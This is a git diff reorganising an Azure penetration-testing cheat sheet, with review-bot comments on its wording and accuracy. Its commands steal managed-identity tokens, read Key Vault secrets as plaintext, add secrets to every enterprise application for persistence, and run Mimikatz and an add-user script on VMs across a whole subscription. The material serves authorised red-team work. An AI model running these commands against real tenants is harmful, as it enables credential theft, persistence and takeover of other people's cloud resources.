diff --git a/docs/cloud/azure/Cloud - Azure Pentest.md b/docs/cloud/azure/Cloud - Azure Pentest.md index 93a2290..a220d7a 100644 --- a/docs/cloud/azure/Cloud - Azure Pentest.md +++ b/docs/cloud/azure/Cloud - Azure Pentest.md @@ -14,14 +14,6 @@ * [Stealing Tokens](#stealing-tokens) * [Stealing tokens from az cli](#stealing-tokens-from-az-cli) * [Stealing tokens from az powershell](#stealing-tokens-from-az-powershell) -* [Add Credentials to All Enterprise Applications](#add-credentials-to-all-enterprise-applications) -* [Spawn SSH for Azure Web App](#spawn-ssh-for-azure-web-app) -* [Azure Storage Blob](#azure-storage-blob) - * [Enumerate blobs](#enumerate-blobs) - * [SAS URL](#sas-url) - * [List and download blobs](#list-and-download-blobs) -* [Virtual Machine RunCommand](#virtual-machine-runcommand) -* [KeyVault Secrets](#keyvault-secrets) * [Pass The Certificate](#pass--the-certificate) * [Pass The PRT](#pass-the-prt) * [Intunes Administration](#intunes-administration) 
@@ -188,81 +180,6 @@ ``` * [**dafthack/GraphRunner**](https://github.com/dafthack/GraphRunner) - A Post-exploitation Toolset for Interacting with the Microsoft Graph API - -## Enumeration - -## Enumeration methodology - -```powershell -# Check Azure Joined -PS> dsregcmd.exe /status -+----------------------------------------------------------------------+ -| Device State | -+----------------------------------------------------------------------+ - AzureAdJoined : YES - EnterpriseJoined : NO - DomainJoined : NO - Device Name : jumpvm - -# Enumerate resources -PS Az> Get-AzResource - -# Enumerate role assignments -PS Az> Get-AzRoleAssignment -Scope /subscriptions//resourceGroups/RESEARCH/providers/Microsoft.Compute/virtualMachines/` - -# Get info on a role -PS Az> Get-AzRoleDefinition -Name "Virtual Machine Command Executor" - -# Get info user -PS AzureAD> Get-AzureADUser -ObjectId -PS AzureAD> Get-AzureADUser -ObjectId test@.onmicrosoft.com | fl * - -# List all groups -PS AzureAD> Get-AzureADGroup -All $true - -# Get members of a group -PS Az> Get-AzADGroup -DisplayName '' -PS Az> Get-AzADGroupMember -GroupDisplayName '' | select UserPrincipalName - -# Get Azure AD information -PS> Import-Module C:\Tools\AADInternals\AADInternals.psd1 -PS AADInternals> Get-AADIntLoginInformation -UserName admin@.onmicrosoft.com -PS AADInternals> Get-AADIntTenantID -Domain .onmicrosoft.com # Get Tenant ID -PS AADInternals> Invoke-AADIntReconAsOutsider -DomainName # Get all the information - -# Check if there is a user logged-in to az cli -PS> az ad signed-in-user show - -# Check AppID Alternative Names/Display Name -PS AzureAD> Get-AzureADServicePrincipal -All $True | ?{$_.AppId -eq ""} | fl - - -# Get all application objects registered using the current tenant -PS AzureAD> Get-AzureADApplication -All $true - -# Get all details about an application -PS AzureAD> Get-AzureADApplication -ObjectId | fl * - -# List all VM's the user has access to -PS Az> Get-AzVM -PS Az> Get-AzVM | fl - -# 
Get all function apps -PS Az> Get-AzFunctionApp - -# Get all webapps -PS Az> Get-AzWebApp -PS Az> Get-AzWebApp | select-object Name, Type, Hostnames - -# List all storage accounts -PS Az> Get-AzStorageAccount -PS Az> Get-AzStorageAccount | fl - -# List all keyvaults -PS Az> Get-AzKeyVault -``` - - ## Token from Managed Identity > **MSI_ENDPOINT** is an alias for **IDENTITY_ENDPOINT**, and **MSI_SECRET** is an alias for **IDENTITY_HEADER**. 
@@ -430,123 +347,6 @@ az account get-access-token --resource-type aad-graph * Users can save tokens using `Save-AzContext` -## Add credentials to all Enterprise Applications - -```powershell -# Add secrets -PS > . C:\Tools\Add-AzADAppSecret.ps1 -PS > Add-AzADAppSecret -GraphToken $graphtoken -Verbose - -# Use secrets to authenticate as Service Principal -PS > $password = ConvertTo-SecureString '' -AsPlainText -Force -PS > $creds = New-Object System.Management.Automation.PSCredential('', $password) -PS > Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant '' -``` - -## Spawn SSH for Azure Web App - -```powershell -az webapp create-remote-connection --subscription --resource-group -n -``` - -## Azure Storage Blob - -* Blobs - `*.blob.core.windows.net` -* File Services - `*.file.core.windows.net` -* Data Tables - `*.table.core.windows.net` -* Queues - `*.queue.core.windows.net` - -### Enumerate blobs - -```powershell -PS > . C:\Tools\MicroBurst\Misc\InvokeEnumerateAzureBlobs.ps1 -PS > Invoke-EnumerateAzureBlobs -Base -OutputFile azureblobs.txt -Found Storage Account - testsecure.blob.core.windows.net -Found Storage Account - securetest.blob.core.windows.net -Found Storage Account - securedata.blob.core.windows.net -Found Storage Account - securefiles.blob.core.windows.net -``` - -### SAS URL - -* Use [Storage Explorer](https://azure.microsoft.com/en-us/features/storage-explorer/) -* Click on **Open Connect Dialog** in the left menu. -* Select **Blob container**. -* On the **Select Authentication Method** page - * Select **Shared access signature (SAS)** and click on Next - * Copy the URL in **Blob container SAS URL** field. - -:warning: You can also use `subscription`(username/password) to access storage resources such as blobs and files. 
- -### List and download blobs - -```powershell -PS Az> Get-AzResource -PS Az> Get-AzStorageAccount -name -ResourceGroupName -PS Az> Get-AzStorageContainer -Context (Get-AzStorageAccount -name -ResourceGroupName ).context -PS Az> Get-AzStorageBlobContent -Container -Context (Get-AzStorageAccount -name -ResourceGroupName ).context -Blob -``` - -## Virtual Machine RunCommand - -Requirements: -* `Microsoft.Compute/virtualMachines/runCommand/action` - -```powershell -# Get Public IP of VM : query the network interface -PS AzureAD> Get-AzVM -Name -ResourceGroupName | select -ExpandProperty NetworkProfile -PS AzureAD> Get-AzNetworkInterface -Name -PS AzureAD> Get-AzPublicIpAddress -Name - -# Execute Powershell script on the VM -PS AzureAD> Invoke-AzVMRunCommand -VMName -ResourceGroupName -CommandId 'RunPowerShellScript' -ScriptPath 'C:\Tools\adduser.ps1' -Verbose - -# Connect via WinRM -PS C:\Tools> $password = ConvertTo-SecureString '' -AsPlainText -Force -PS C:\Tools> $creds = New-Object System.Management.Automation.PSCredential('username', $Password) -PS C:\Tools> $sess = New-PSSession -ComputerName -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer) -PS C:\Tools> Enter-PSSession $sess -``` - -> Allow anyone with "Contributor" rights to run PowerShell scripts on any Azure VM in a subscription as NT Authority\System - -```powershell -# List available VMs -PS C:\> Get-AzureRmVM -status | where {$_.PowerState -EQ "VM running"} | select ResourceGroupName,Name -ResourceGroupName Name ------------------ ---- -TESTRESOURCES Remote-Test - -# Execute Powershell script on the VM -PS C:\> Invoke-AzureRmVMRunCommand -ResourceGroupName TESTRESOURCES -VMName Remote-Test -CommandId RunPowerShellScript -ScriptPath Mimikatz.ps1 -``` - -Against the whole subscription using MicroBurst.ps1 - -```powershell -Import-module MicroBurst.psm1 -Invoke-AzureRmVMBulkCMD -Script Mimikatz.ps1 -Verbose -output Output.txt -``` - - -## KeyVault Secrets - 
-```powershell -# keyvault access token -curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&apiversion=2017-09-01" -H secret:$IDENTITY_HEADER -curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com&apiversion=2017-09-01" -H secret:$IDENTITY_HEADER - -# connect -PS> $token = 'eyJ0..' -PS> $keyvaulttoken = 'eyJ0..' -PS Az> Connect-AzAccount -AccessToken $token -AccountId 2e91a4fea0f2-46ee-8214-fa2ff6aa9abc -KeyVaultAccessToken $keyvaulttoken - -# query the vault and the secrets -PS Az> Get-AzKeyVault -PS Az> Get-AzKeyVaultSecret -VaultName ResearchKeyVault -PS Az> Get-AzKeyVaultSecret -VaultName ResearchKeyVault -Name Reader -AsPlainText -``` - ## Pass The PRT > MimiKatz (version 2.2.0 and above) can be used to attack (hybrid) Azure AD joined machines for lateral movement attacks via the Primary Refresh Token (PRT) which is used for Azure AD SSO (single sign-on). diff --git a/docs/cloud/azure/azure-access-and-token.md b/docs/cloud/azure/azure-access-and-token.md index 0090ccc..d101acf 100644 --- a/docs/cloud/azure/azure-access-and-token.md +++ b/docs/cloud/azure/azure-access-and-token.md @@ -1,5 +1,19 @@ # Azure AD Tokens +## Connection + +After a successfull authentication, you will get an access token. + +* az cli +* Azure AD Powershell +* Az Powershell +* External HTTP API +* Internal HTTP API + ```ps1 + curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com&api-version=2017-09-01" -H secret:$IDENTITY_HEADER + curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&api-version=2017-09-01" -H secret:$IDENTITY_HEADER + ``` + ## Access Token diff --git a/docs/cloud/azure/azure-devices-users-services.md b/docs/cloud/azure/azure-devices-users-services.md index 39073b6..81f3791 100644 --- a/docs/cloud/azure/azure-devices-users-services.md +++ b/docs/cloud/azure/azure-devices-users-services.md 
@@ -9,10 +9,21 @@ ## Users * List users: `Get-AzureADUser -All $true` -* Enumerate groups: `Get-AzureADGroup -All $true` +* Enumerate groups + + ```ps1 + # List groups + Get-AzureADGroup -All $true + + # Get members of a group + Get-AzADGroup -DisplayName '' + Get-AzADGroupMember -GroupDisplayName '' | select UserPrincipalName + ``` + * Enumerate roles: `Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember` * List roles: `Get-AzureADMSRoleDefinition | ?{$_.IsBuiltin -eq $False} | select DisplayName` * Add user to a group + ```ps1 $groupid = "" $targetmember = "" @@ -49,6 +60,20 @@ Get-AzureADUserRegisteredDevice -ObjectId $user.ObjectId -All $true ``` +### Device State + +```ps1 +PS> dsregcmd.exe /status ++----------------------------------------------------------------------+ +| Device State | ++----------------------------------------------------------------------+ + AzureAdJoined : YES + EnterpriseJoined : NO + DomainJoined : NO + Device Name : jumpvm +``` + + ### Join Devices * [Enroll Windows 10/11 devices in Intune](https://learn.microsoft.com/en-us/mem/intune/user-help/enroll-windows-10-device) diff --git a/docs/cloud/azure/azure-enumeration.md b/docs/cloud/azure/azure-enumeration.md index 05fede3..226b2c2 100644 --- a/docs/cloud/azure/azure-enumeration.md +++ b/docs/cloud/azure/azure-enumeration.md 
@@ -20,16 +20,19 @@ * Federation with Azure AD or O365 ```powershell + Get-AADIntLoginInformation -UserName @.onmicrosoft.com https://login.microsoftonline.com/getuserrealm.srf?login=@&xml=1 https://login.microsoftonline.com/getuserrealm.srf?login=root@.onmicrosoft.com&xml=1 ``` * Get the Tenant ID ```powershell + Get-AADIntTenantID -Domain .onmicrosoft.com https://login.microsoftonline.com//.well-known/openid-configuration https://login.microsoftonline.com/.onmicrosoft.com/.well-known/openid-configuration ``` + ### Enumerate Email > By default, O365 has a lockout policy of 10 tries, and it will lock out an account for one (1) minute. @@ -60,6 +63,7 @@ PS> Invoke-MSOLSpray -UserList C:\Tools\validemails.txt -Password -Ve Extract openly available information for the given tenant: [aadinternals.com/osint](https://aadinternals.com/osint/) ```ps1 +Invoke-AADIntReconAsOutsider -DomainName Invoke-AADIntReconAsOutsider -Domain "company.com" | Format-Table Invoke-AADIntReconAsOutsider -UserName "user@company.com" | Format-Table ``` 
@@ -80,13 +84,33 @@ Subdomain Service * Using Az Powershell module ```powershell + # Enumerate resources PS Az> Get-AzResource - PS Az> Get-AzVM | fl + + # List all VM's the user has access to + PS Az> Get-AzVM + + # Get all webapps PS Az> Get-AzWebApp | ?{$_.Kind -notmatch "functionapp"} + + # Get all function apps PS Az> Get-AzFunctionApp - PS Az> Get-AzStorageAccount | fl + + # List all storage accounts + PS Az> Get-AzStorageAccount + + # List all keyvaults PS Az> Get-AzKeyVault + + # Get all application objects registered using the current tenant + PS AzureAD> Get-AzureADApplication -All $true + + # Enumerate role assignments + PS Az> Get-AzRoleAssignment -Scope /subscriptions//resourceGroups/RESEARCH/providers/Microsoft.Compute/virtualMachines/ PS Az> Get-AzRoleAssignment -SignInName test@.onmicrosoft.com + + # Check AppID Alternative Names/Display Name + PS AzureAD> Get-AzureADServicePrincipal -All $True | ?{$_.AppId -eq ""} | fl ``` * Using az cli diff --git a/docs/cloud/azure/azure-persistence.md b/docs/cloud/azure/azure-persistence.md new file mode 100644 index 0000000..efcb9b9 --- /dev/null +++ b/docs/cloud/azure/azure-persistence.md @@ -0,0 +1,16 @@ +# Azure Persistence + +## Add secrets to application + +* Add secrets with [lutzenfried/OffensiveCloud/Add-AzADAppSecret.ps1](https://github.com/lutzenfried/OffensiveCloud/blob/main/Azure/Tools/Add-AzADAppSecret.ps1) + ```powershell + PS > . C:\Tools\Add-AzADAppSecret.ps1 + PS > Add-AzADAppSecret -GraphToken $graphtoken -Verbose + ``` + +* Use secrets to authenticate as Service Principal + ```ps1 + PS > $password = ConvertTo-SecureString '' -AsPlainText -Force + PS > $creds = New-Object System.Management.Automation.PSCredential('', $password) + PS > Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant '' + ``` \ No newline at end of file diff --git a/docs/cloud/azure/azure-services.md b/docs/cloud/azure/azure-services.md index ab0eec0..aeb2483 100644 --- a/docs/cloud/azure/azure-services.md 
+++ b/docs/cloud/azure/azure-services.md @@ -1,6 +1,52 @@ # Azure Services -## Azure Runbook +## Virtual Machine + +### RunCommand + +> Allow anyone with "Contributor" rights to run PowerShell scripts on any Azure VM in a subscription as `NT Authority\System` + +**Requirements**: +* `Microsoft.Compute/virtualMachines/runCommand/action` + +* List available Virtual Machines + ```powershell + PS C:\> Get-AzureRmVM -status | where {$_.PowerState -EQ "VM running"} | select ResourceGroupName,Name + ResourceGroupName Name + ----------------- ---- + TESTRESOURCES Remote-Test + ``` + +* Get Public IP of VM by querying the network interface + ```powershell + PS AzureAD> Get-AzVM -Name -ResourceGroupName | select -ExpandProperty NetworkProfile + PS AzureAD> Get-AzNetworkInterface -Name + PS AzureAD> Get-AzPublicIpAddress -Name + ``` + +* Execute Powershell script on the VM, like `adduser` + ```ps1 + PS AzureAD> Invoke-AzVMRunCommand -VMName -ResourceGroupName -CommandId 'RunPowerShellScript' -ScriptPath 'C:\Tools\adduser.ps1' -Verbose + PS Azure C:\> Invoke-AzureRmVMRunCommand -ResourceGroupName TESTRESOURCES -VMName Remote-Test -CommandId RunPowerShellScript -ScriptPath Mimikatz.ps1 + ``` + +* Finally you should be able to connect via WinRM + ```ps1 + $password = ConvertTo-SecureString '' -AsPlainText -Force + $creds = New-Object System.Management.Automation.PSCredential('username', $Password) + $sess = New-PSSession -ComputerName -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer) + Enter-PSSession $sess + ``` + +Against the whole subscription using `MicroBurst.ps1` + +```powershell +Import-module MicroBurst.psm1 +Invoke-AzureRmVMBulkCMD -Script Mimikatz.ps1 -Verbose -output Output.txt +``` + + +## Runbook Runbook must be **SAVED** and **PUBLISHED** before running it. 
@@ -41,7 +87,7 @@ Runbook must be **SAVED** and **PUBLISHED** before running it. ``` -## Azure Service Principal +## Service Principal * Generate a new service principal password/secret ```ps1 
@@ -58,6 +104,75 @@ Runbook must be **SAVED** and **PUBLISHED** before running it. ``` +## KeyVault + +* Keyvault access token + ```powershell + curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&apiversion=2017-09-01" -H secret:$IDENTITY_HEADER + curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com&apiversion=2017-09-01" -H secret:$IDENTITY_HEADER + ``` + +* Connect with the access token + ```ps1 + PS> $token = 'eyJ0..' + PS> $keyvaulttoken = 'eyJ0..' + PS> $accid = '2e...bc' + PS Az> Connect-AzAccount -AccessToken $token -AccountId $accid -KeyVaultAccessToken $keyvaulttoken + ``` + +* Query the vault and the secrets + ```ps1 + PS Az> Get-AzKeyVault + PS Az> Get-AzKeyVaultSecret -VaultName + PS Az> Get-AzKeyVaultSecret -VaultName -Name Reader -AsPlainText + ``` + + +## Azure Storage Blob + +* Blobs - `*.blob.core.windows.net` +* File Services - `*.file.core.windows.net` +* Data Tables - `*.table.core.windows.net` +* Queues - `*.queue.core.windows.net` + +### Enumerate blobs + +```powershell +PS > . C:\Tools\MicroBurst\Misc\InvokeEnumerateAzureBlobs.ps1 +PS > Invoke-EnumerateAzureBlobs -Base -OutputFile azureblobs.txt +Found Storage Account - redacted.blob.core.windows.net +``` + +### List and download blobs + +```powershell +PS Az> Get-AzResource +PS Az> Get-AzStorageAccount -name -ResourceGroupName +PS Az> Get-AzStorageContainer -Context (Get-AzStorageAccount -name -ResourceGroupName ).context +PS Az> Get-AzStorageBlobContent -Container -Context (Get-AzStorageAccount -name -ResourceGroupName ).context -Blob +``` + +### SAS URL + +* Use [Storage Explorer](https://azure.microsoft.com/en-us/features/storage-explorer/) +* Click on **Open Connect Dialog** in the left menu. +* Select **Blob container**. +* On the **Select Authentication Method** page + * Select **Shared access signature (SAS)** and click on Next + * Copy the URL in **Blob container SAS URL** field. 
+ +:warning: You can also use `subscription`(username/password) to access storage resources such as blobs and files. + + +## Azure Web App + +### SSH Connection + +```powershell +az webapp create-remote-connection --subscription --resource-group -n +``` + + ## Azure Devops * Verify the validity of an Azure Personal Access Token (PAT)
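Review bot: The TOC hunk in `Cloud - Azure Pentest.md` (`@@ -14,14`) removes eight entries without leaving any pointer to where the content went, so a reader of the pentest page now loses Storage Blob, RunCommand, KeyVault and the app-secret persistence trick entirely; add a short "See also" line in that page linking `azure-services.md` and `azure-persistence.md` where the sections used to be. While touching this list, the retained entry `* [Pass The Certificate](#pass--the-certificate)` has a doubled hyphen in its anchor that looks like a typo; verify it actually matches the heading it points at.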
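Review bot: Several commands in the deleted "Enumeration methodology" block (`@@ -188,81`) are not re-added in any other file of this patch, so they are lost rather than moved: `Get-AzRoleDefinition -Name "Virtual Machine Command Executor"`, `Get-AzureADUser -ObjectId test@.onmicrosoft.com | fl *`, `Get-AzureADApplication -ObjectId | fl *`, `az ad signed-in-user show`, `Get-AzWebApp | select-object Name, Type, Hostnames`, and the `Import-Module C:\Tools\AADInternals\AADInternals.psd1` line that every `*-AADInt*` cmdlet re-added elsewhere depends on. Either restore them in `azure-enumeration.md` (the role-definition lookup belongs next to the `Get-AzRoleAssignment` lines, the signed-in-user check next to the az cli bullet) or say in the commit message that they were dropped on purpose.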
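Review bot: In the new "Connection" section of `azure-access-and-token.md`, "successfull" should be "successful", and the fence under "Internal HTTP API" is tagged `ps1` but holds curl commands that expand `$IDENTITY_ENDPOINT` and `$IDENTITY_HEADER` the bash way; in PowerShell those would have to be `$env:IDENTITY_ENDPOINT` and `$env:IDENTITY_HEADER`, so either tag the fence `bash` or rewrite the two lines for PowerShell. The list also names "az cli", "Azure AD Powershell", "Az Powershell" and "External HTTP API" with no command for any of them while only the managed-identity case gets an example; a one-liner per entry, or a link to the per-tool sections below, would make the list useful. The `api-version=2017-09-01` spelling here is the correct one; the KeyVault block added to `azure-services.md` in this same patch should match it.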
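Review bot: The expanded "Enumerate groups" block in `azure-devices-users-services.md` (`@@ -9,10`) mixes two modules without saying so: `Get-AzureADGroup` comes from the AzureAD module while `Get-AzADGroup` and `Get-AzADGroupMember` come from Az, so a reader who loaded only one of them gets a "not recognized" error on the other line. Either stay on one module for the whole block or label the lines with the `PS AzureAD>` / `PS Az>` prompts this repo uses elsewhere.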
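Review bot: The new "Device State" subsection (`@@ -49,6`) drops `dsregcmd.exe /status` between cmdlets that query the tenant (`Get-AzureADUserRegisteredDevice`) and "Join Devices", but unlike its neighbours it runs locally on a Windows host you already have a shell on and only describes that host. A one-line lead-in saying so, plus what the shown `AzureAdJoined : YES` / `DomainJoined : NO` combination means (Azure AD joined rather than hybrid joined, where both would be YES), would stop readers from looking for a tenant-wide equivalent. The two trailing blank lines before `### Join Devices` can be one.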
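Review bot: The two AADInternals lines added in `azure-enumeration.md` (`@@ -20,16`), `Get-AADIntLoginInformation -UserName @.onmicrosoft.com` and `Get-AADIntTenantID -Domain .onmicrosoft.com`, are dropped into fences that otherwise hold bare `login.microsoftonline.com` URLs, and nothing on this page loads the module; bring the `Import-Module C:\Tools\AADInternals\AADInternals.psd1` line that preceded them in the deleted block along with them, or put them in their own fence with a comment naming the module. The `-UserName` placeholder also lost its local part compared with the original `admin@.onmicrosoft.com`.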
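Review bot: The added `Invoke-AADIntReconAsOutsider -DomainName` in the `@@ -60,6` hunk duplicates the next line, `Invoke-AADIntReconAsOutsider -Domain "company.com" | Format-Table`; `-Domain` resolves to the same `-DomainName` parameter through PowerShell's prefix matching, so the block now shows one call with the full parameter name and no value and one with an abbreviated name and a value. Keep a single line, `Invoke-AADIntReconAsOutsider -DomainName "company.com" | Format-Table`, and drop the other.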
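Review bot: In the `@@ -80,13` hunk the lines `PS AzureAD> Get-AzureADApplication -All $true` and `PS AzureAD> Get-AzureADServicePrincipal -All $True | ?{$_.AppId -eq ""} | fl` are placed under the bullet "Using Az Powershell module", but their prompt and their `*-AzureAD*` names mark them as AzureAD-module cmdlets; move them to a "Using AzureAD Powershell module" bullet, or next to the other AzureAD enumeration in `azure-devices-users-services.md`, so the bullet heading stays true. Also the comment `# Get all webapps` sits on a line that filters out function apps (`?{$_.Kind -notmatch "functionapp"}`); since the next command lists function apps separately, the comment should say "excluding function apps".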
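Review bot: In the new `azure-persistence.md`, `Add-AzADAppSecret -GraphToken $graphtoken -Verbose` relies on a `$graphtoken` variable the file never obtains; add the line that acquires a Graph token, or link `azure-access-and-token.md` from this same patch, so the page works on its own. The old heading in `Cloud - Azure Pentest.md` was "Add credentials to all Enterprise Applications", and that "all" is the security-relevant part: adding a secret to every application the token can reach is loud, leaves a credential on each app and is painful to clean up. The new title "Add secrets to application" hides this; keep a warning about the blast radius and suggest targeting a single app where possible. Minor: the two fences use `powershell` and `ps1` for the same language, and the file lacks a trailing newline ("\ No newline at end of file").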
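Review bot: The new RunCommand section in `azure-services.md` (`@@ -1,6`) mixes the retired AzureRM module (`Get-AzureRmVM`, `Invoke-AzureRmVMRunCommand`, `Invoke-AzureRmVMBulkCMD`) with the Az module (`Get-AzVM`, `Invoke-AzVMRunCommand`), labels Az cmdlets with a `PS AzureAD>` prompt, and has one line prefixed `PS Azure C:\>`; settle on Az for the listing and execution lines (`Get-AzVM -Status`, `Invoke-AzVMRunCommand`) and note that the MicroBurst bulk command is the one place the AzureRM name survives. The prose says "using `MicroBurst.ps1`" while the command is `Import-module MicroBurst.psm1`; make them agree. "Finally you should be able to connect via WinRM" hides two prerequisites worth stating: the `adduser.ps1` run in the previous step must have created the account used in `$creds`, and the VM's public IP must expose WinRM (5985/5986) through its NSG, otherwise `New-PSSession` fails even though RunCommand succeeded.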
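Review bot: Dropping "Azure" from "Azure Service Principal" (`@@ -41,7`) and from "Azure Runbook" makes the headings in `azure-services.md` inconsistent with the ones this same patch adds further down, "## Azure Storage Blob" and "## Azure Web App", and with the existing "## Azure Devops"; pick one convention for the file and apply it to every top-level heading.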
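Review bot: Both curl lines in the new KeyVault section (`@@ -58,6`) use `apiversion=2017-09-01` without the hyphen, while the identical requests added to `azure-access-and-token.md` in this patch spell it `api-version=2017-09-01`, which is what the managed-identity endpoint expects; fix the two lines here instead of carrying the typo over from the deleted section, and tag that fence as shell rather than `powershell`. In the same section, `Get-AzKeyVaultSecret -VaultName -Name Reader -AsPlainText` blanked the vault name but kept `Reader`, the secret name from the original `ResearchKeyVault` example, so it now reads like a fixed parameter; make it a placeholder too, and say which token feeds `-AccessToken` (the `management.azure.com` one) and which `-KeyVaultAccessToken` (the `vault.azure.net` one). Under "SAS URL", ":warning: You can also use `subscription`(username/password)" needs a space before the parenthesis. Under "SSH Connection" the block shows only `az webapp create-remote-connection`, which opens a local TCP tunnel; add the `ssh` command against the local port it prints, otherwise the heading promises more than the block delivers.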